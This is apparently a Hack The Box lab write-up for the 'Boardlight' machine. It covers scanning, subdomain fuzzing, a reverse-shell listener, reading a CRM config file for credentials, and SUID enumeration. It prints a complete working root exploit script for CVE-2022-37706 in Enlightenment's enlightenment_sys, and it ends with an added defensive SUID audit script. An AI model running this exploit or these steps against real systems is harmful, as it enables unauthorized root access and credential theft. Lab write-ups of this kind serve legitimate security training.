Boardlight - Hack The Box

Reconnaissance

  • Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -Pn 10.10.11.11

  • Add domain to local DNS
echo "10.10.11.11 board.htb" >> /etc/hosts

  • Subdomain fuzzing with Gobuster
gobuster vhost -u http://board.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 20 --append-domain

  • Add subdomain to local DNS
echo "10.10.11.11 crm.board.htb" >> /etc/hosts

Exploitation

  • Login with the admin default password

  • Test PHP bypass

  • Start a listener and catch the reverse shell

nc -nlvp 9000

Post-exploitation

  • Find conf files
find / -name \*conf\* 2>/dev/null | grep -vE "proc|sys|usr|etc|boot|lib|dpkg"

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

  • Pivoting
su larissa
  • Find SUID
find / -perm -4000 2>/dev/null

  • Execute the exploit (CVE-2022-37706), saved as exploit.sh
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

chmod +x exploit.sh
./exploit.sh
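Defender-side counterpart to the "Find SUID" step above, as an added example that is not part of the original writeup: an audit script that lists SUID binaries under a root directory and flags any that are not on an allow-list, so a helper such as enlightenment_sys shows up before an attacker finds it. The install path used for the sample file and the baseline path /etc/suid-baseline.txt are assumptions.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit SUID files under ROOT against a
# baseline (one path per line, relative to ROOT) and print every SUID file not on it.
# Remediation for an unexpected hit is "chmod u-s <file>" or updating the package.

# suid_audit ROOT BASELINE: prints the full path of each unexpected SUID file.
suid_audit() {
    root=$1
    baseline=$2
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort | while IFS= read -r f; do
        rel=${f#"$root"}                      # path relative to the scanned root
        grep -qxF -- "$rel" "$baseline" || printf '%s\n' "$f"
    done
}

# suid_audit_count ROOT BASELINE: number of unexpected SUID files, for alerting.
suid_audit_count() {
    suid_audit "$1" "$2" | wc -l | tr -d ' '
}

# build_sample_tree: constructed sample filesystem (not a real host) with two SUID
# files, only one of which is on the baseline. Prints the temporary root directory.
# The enlightenment_sys location below is a hypothetical install path.
build_sample_tree() {
    tree=$(mktemp -d)
    mkdir -p "$tree/usr/bin" "$tree/usr/lib/enlightenment/utils"
    printf '#!/bin/sh\n' > "$tree/usr/bin/passwd"
    printf '#!/bin/sh\n' > "$tree/usr/lib/enlightenment/utils/enlightenment_sys"
    chmod 4755 "$tree/usr/bin/passwd" "$tree/usr/lib/enlightenment/utils/enlightenment_sys"
    printf '/usr/bin/passwd\n' > "$tree/baseline.txt"
    printf '%s\n' "$tree"
}

# Demo on the constructed tree. On a real host: suid_audit / /etc/suid-baseline.txt
demo_root=$(build_sample_tree)
suid_audit "$demo_root" "$demo_root/baseline.txt"
rm -rf "$demo_root"
```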